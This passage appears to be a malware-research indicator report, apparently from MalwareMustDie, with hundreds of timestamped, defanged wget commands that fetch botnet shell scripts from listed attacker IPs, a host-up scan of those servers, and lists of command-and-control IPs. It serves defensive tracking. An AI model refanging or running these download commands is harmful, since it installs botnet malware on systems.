2016-01-09 00:03:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-08 21:51:53 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 21:43:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:25:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:24:16 | wget hxxp:// 31.14.136.142/bins . sh
2016-01-08 21:15:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:00:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:50:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:33:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:25:50 | wget ftx://51.254.238.19/gb . sh
2016-01-08 20:24:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 19:48:28 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-08 17:43:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 17:33:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 17:19:57 | wget hxp://208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 16:57:53 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 16:25:16 | wget ftx://51.254.238.19/gb . sh
2016-01-08 15:39:48 | wget ftx://51.254.238.19/gb . sh
2016-01-08 15:19:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 15:09:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:59:52 | wget ftx://51.254.238.19/gb . sh
2016-01-08 14:29:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:19:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:01:43 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 13:51:37 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 13:09:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 12:51:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:32:19 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 12:29:03 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:22:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 12:19:37 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:07:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 10:36:57 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 10:27:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 10:07:45 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-08 09:54:24 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 09:44:30 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 08:43:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-08 08:43:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-08 08:28:11 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 01:20:08 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-08 00:58:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 00:51:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 23:35:21 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 23:25:51 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 21:40:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 21:30:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 19:37:00 | wget hxxp:// 192.227.170.67/Binaries . sh
2016-01-07 16:10:32 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-07 16:09:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 15:48:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 15:38:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 11:59:09 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 11:54:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:05:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 09:03:16 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 08:56:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 08:29:38 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 08:24:46 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 08:24:46 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:45:01 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 07:21:11 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:16:17 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 05:33:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 05:18:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 05:04:59 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 03:03:21 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 02:55:07 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-07 02:43:59 | wget hxxp:// 192.227.170.67/Binaries . sh
2016-01-07 02:32:13 | busybox wget hxxp:// 80.82.64.177/fucks . sh
2016-01-07 02:32:13 | wget1 hxxp:// 80.82.64.177/fucks2 . sh
2016-01-07 02:27:28 | busybox wget hxxp:// 80.82.64.177/fucks . sh
2016-01-07 02:27:28 | wget1 hxxp:// 80.82.64.177/fucks2 . sh
2016-01-07 00:14:11 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 17:20:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 17:09:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:54:11 | wget hxxp:// 208.67.1.142/DOGDICKS/Binarys . sh
2016-01-06 16:45:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:35:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:06:23 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-06 14:13:15 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 13:27:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 13:18:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 10:41:35 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 09:56:04 | wget hxxp:// "freedomstress.com"/test/Binarys . sh
2016-01-06 09:41:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 09:31:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 07:40:31 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 07:23:01 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-06 07:10:37 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 05:49:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:40:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:29:56 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-06 05:29:55 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-06 05:23:13 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:13:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 03:21:23 | wget hxxp:// 5.196.249.163/IRC/loldongs . sh
2016-01-06 03:12:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 02:12:26 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-06 02:03:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:53:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:41:14 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 01:28:19 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 01:18:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:15:55 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-06 01:08:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 23:10:08 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-05 21:29:35 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-05 20:59:37 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-05 20:46:16 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 20:39:07 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 16:04:50 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 15:34:17 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 15:09:05 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 14:41:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 14:31:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 12:01:48 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 11:59:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 11:53:10 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 11:49:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 11:25:12 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 10:35:24 | wget hxxp:// 192.243.109.128/gtop . sh
2016-01-05 10:31:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 10:21:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 10:15:52 | wget hxxp:// 192.243.109.128/gtop . sh
2016-01-05 09:59:50 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 09:33:56 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 08:32:41 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-05 08:32:39 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-05 06:50:33 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 06:19:51 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 05:44:13 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 05:39:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 05:29:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 04:56:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 04:53:55 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 04:46:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 04:05:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 02:54:58 | wget hxxp:// 208.67.1.40/bin . sh
2016-01-05 02:29:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 02:19:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 01:54:59 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 01:21:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 00:42:52 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 00:26:00 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 00:18:06 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 23:58:53 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 23:52:47 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 23:25:16 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 23:19:40 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-04 23:02:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 22:52:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 22:42:39 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 22:35:24 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 22:34:48 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-04 22:17:31 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-04 21:05:28 | wget hxxp:// 23.94.29.218/run . sh
2016-01-04 20:53:42 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 20:13:45 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 19:56:29 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 19:20:14 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 18:56:34 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 17:01:19 | wget hxxp:// 23.94.29.218/run . sh
2016-01-04 16:34:40 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 16:06:50 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 11:01:49 | wget hxxp:/64.20.33.134/gtop . sh
2016-01-04 09:11:33 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 08:38:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 08:29:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 08:26:16 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 08:16:25 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 07:50:23 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 07:36:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-04 07:36:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-04 07:13:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 07:03:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 02:34:18 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 02:28:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 02:18:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 02:03:32 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 01:21:29 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 00:52:14 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 23:27:40 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 23:25:27 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 23:16:17 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 23:13:08 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 23:01:48 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 12:40:30 | wget -q hxxp:// 208.67.1.165/DOGDICKS/Binarys . sh
2016-01-03 12:14:32 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 12:04:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 10:42:45 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 10:31:57 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 10:20:26 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 09:25:51 | wget hxxp:// 208.67.1.40/bin . sh
2016-01-03 09:03:19 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 08:31:45 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 08:11:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 08:01:24 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 07:57:40 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 07:17:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-03 07:17:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-03 06:31:16 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-03 06:12:38 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 06:01:00 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 05:55:18 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-03 05:20:40 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 05:06:29 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 04:59:35 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 04:57:56 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 04:52:15 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 04:23:22 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 04:18:00 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 04:16:34 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 03:55:01 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 03:49:30 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 03:32:56 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 03:25:28 | wget 93.171.158.242/rget . sh
2016-01-03 03:20:45 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 02:48:19 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 02:37:05 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-03 02:16:46 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 01:41:23 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 01:40:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 01:07:29 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 00:14:45 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 00:13:17 | wget hxxp:// 208.67.1.40/bin . sh
2016-01-03 00:05:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 23:16:45 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 22:59:48 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 17:36:24 | wget ftx://185.62.190.156/gtop . sh
2016-01-02 17:29:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 17:28:24 | wget ftx://185.62.190.156/gtop . sh
2016-01-02 17:19:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 14:57:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 14:47:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 11:36:27 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-02 11:18:28 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 11:03:35 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 09:17:34 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 09:17:33 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 08:59:56 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 08:42:30 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 08:17:15 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-02 08:12:53 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:55:07 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-02 07:39:18 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:28:20 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:10:25 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:07:38 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-02 06:27:05 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 06:17:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 04:40:30 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 04:36:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 04:32:52 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 04:26:31 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-02 04:16:45 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 04:05:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 03:55:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 03:46:59 | wget hxxp:// 198.12.97.93/Bot/stun . sh
2016-01-02 03:08:46 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 03:08:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 00:47:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 00:25:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 00:16:05 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 23:31:25 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 23:11:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 23:01:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 22:43:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 22:37:39 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 22:33:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 22:06:00 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 19:27:39 | wget hxxp:// 74.118.193.239/bin . sh
2016-01-01 10:10:31 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 09:59:17 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 09:20:34 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 08:55:03 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 08:24:38 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 08:20:48 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 08:13:49 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 08:08:20 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 07:04:44 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 06:54:15 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 06:44:01 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 06:30:49 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 06:24:57 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 06:00:52 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 05:08:34 | wget ftx:// 185.62.190.156/gtop . sh
2016-01-01 04:36:17 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 04:24:38 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 04:10:30 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 03:26:20 | wget hxxp:// 89.248.162.171/gtop . sh
2016-01-01 02:45:30 | wget hxxp:// 208.89.211.111/bin . sh
2016-01-01 02:40:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-01 02:40:43 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-01 02:25:46 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 02:18:07 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 02:03:22 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 01:43:22 | wget hxxp:// 208.89.211.111/bin . sh
2016-01-01 01:26:39 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 00:48:23 | wget hxxp:// 208.89.211.111/bin . sh
2016-01-01 00:31:20 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 00:25:53 | wget ftx:// 208.67.1.52/Binarys . sh
2016-01-01 00:17:39 | wget hxxp:// 185.62.190.156/gtop . sh

6. Hosts up checked result (42 is up)

-----------------------------------------------------------------
UpChecked: 70 IP addresses (42 hosts up) scanned in 24.34 seconds
Sun Feb  7 12:37:12 #MalwareMustDie!
-----------------------------------------------------------------
Scan report for "biz.kcscleaning.net" (107.172.23.133)
    Host is up, received reset ttl 48 (0.14s latency).
Scan report for "212.ip-158-69-205.net" (158.69.205.212)
    Host is up, received echo-reply ttl 48 (0.22s latency).
Scan report for "211.ip-158-69-217.net" (158.69.217.211)
    Host is up, received echo-reply ttl 48 (0.22s latency).
Scan report for 162.208.8.203
    Host is up, received echo-reply ttl 53 (0.19s latency).
Scan report for 162.213.195.144
    Host is up, received echo-reply ttl 50 (0.16s latency).
Scan report for 173.208.196.202
    Host is up, received echo-reply ttl 49 (0.17s latency).
Scan report for 185.112.249.111
    Host is up, received echo-reply ttl 49 (0.28s latency).
Scan report for "no.rdns.sharkservers.net" (185.112.249.26)
    Host is up, received echo-reply ttl 49 (0.27s latency).
Scan report for 185.130.5.200
    Host is up, received timestamp-reply ttl 49 (0.28s latency).
Scan report for 185.17.30.239
    Host is up, received echo-reply ttl 50 (0.26s latency).
Scan report for "ip-9-253.dataclub.biz" (185.29.9.253)
    Host is up, received echo-reply ttl 47 (0.30s latency).
Scan report for "web.minsupport.net" (185.52.2.114)
    Host is up, received echo-reply ttl 52 (0.29s latency).
Scan report for "cacti.s42.voby.se" (185.62.189.11)
    Host is up, received echo-reply ttl 50 (0.26s latency).
Scan report for "www.AlphaNineVPS.com" (192.227.170.67)
    Host is up, received echo-reply ttl 46 (0.20s latency).
Scan report for 192.243.109.128
    Host is up, received echo-reply ttl 53 (0.20s latency).
Scan report for "198-12-97-67-host.enwebhost.net" (198.12.97.67)
    Host is up, received echo-reply ttl 51 (0.18s latency).
Scan report for "198-23-238-203-host.enwebhost.net" (198.23.238.203)
    Host is up, received echo-reply ttl 51 (0.17s latency).
Scan report for "198-23-238-215-host.enwebhost.net" (198.23.238.215)
    Host is up, received echo-reply ttl 51 (0.17s latency).
Scan report for "198-23-238-251-host.enwebhost.net" (198.23.238.251)
    Host is up, received echo-reply ttl 51 (0.17s latency).
Scan report for "watchhere.docadvices.com" (199.180.133.178)
    Host is up, received echo-reply ttl 46 (0.15s latency).
Scan report for "mail10.sipanhost.com" (199.231.184.237)
    Host is up, received echo-reply ttl 49 (0.22s latency).
Scan report for "lht194.cowanci.com" (206.72.207.194)
    Host is up, received echo-reply ttl 49 (0.20s latency).
Nmap scan report for 208.67.1.142
    Host is up, received echo-reply ttl 48 (0.19s latency).
Scan report for "sonypaio.com" (208.73.207.236)
    Host is up, received echo-reply ttl 49 (0.26s latency).
Scan report for "server6.lega-helplineservice.com" (208.89.211.111)
    Host is up, received echo-reply ttl 46 (0.18s latency).
Scan report for "server.iceybinary.com" (216.158.225.7)
    Host is up, received echo-reply ttl 51 (0.12s latency).
Scan report for 218.104.49.211
    Host is up, received echo-reply ttl 47 (0.091s latency).
Scan report for 23.227.163.110
    Host is up, received echo-reply ttl 55 (0.15s latency).
Scan report for "host142-136-14-31.serverdedicati.aruba.it" (31.14.136.142)
    Host is up, received echo-reply ttl 47 (0.31s latency).
Scan report for "45.32.232.197.vultr.com" (45.32.232.197)
    Host is up, received echo-reply ttl 48 (0.38s latency).
Scan report for 46.101.71.240
    Host is up, received echo-reply ttl 48 (0.28s latency).
Scan report for "test.interserver.net" (64.20.33.134)
    Host is up, received echo-reply ttl 49 (0.21s latency).
Scan report for 80.82.64.177
    Host is up, received echo-reply ttl 52 (0.35s latency).
Scan report for "no-reverse-dns-configured.com" (89.248.166.131)
    Host is up, received reset ttl 52 (0.36s latency).
Scan report for 94.102.53.144
    Host is up, received echo-reply ttl 52 (0.37s latency).
Scan report for "no-reverse-dns-configured.com" (94.102.63.136)
    Host is up, received echo-reply ttl 52 (0.34s latency).

StickyNote: Additional recent updates indicator (IP for infection panel or CNC)↓

/* Reformatted from previous embedded tweets */
/* Sorted in chronological/dates             */

(Apr 10, 2015)
179.43.146.67 (added)
93.174.95.55
93.158.212.67
23.94.97.17
208.67.1.157
185.47.62.11

(March 5, 2016)
217.20.164.167
208.67.1.91
208.67.1.193
45.32.232.197
52.91.23.21
63.142.254.55

(March 4, 2016)
149.202.242.85
149.202.175.167
149.202.242.83
149.91.83.144
192.210.220.3
216.158.240.36

(February 26, 2016)
93.115.97.75
89.248.162.167

(February 25, 2016)
208.67.1.180
172.245.104.175
23.94.27.117
198.23.238.215
208.67.1.46
208.67.1.180
192.151.158.66

(up to February 15, 2016)
185.11.146.191
185.11.146.151
185.62.190.62
185.62.190.82
185.62.190.156
185.62.190.222
185.62.190.253
188.209.49.163
188.209.52.195
188.209.49.131
188.209.49.165
185.130.5.165
185.130.5.174
185.130.5.200
185.130.5.205
185.130.5.246
80.82.64.177
80.82.78.12
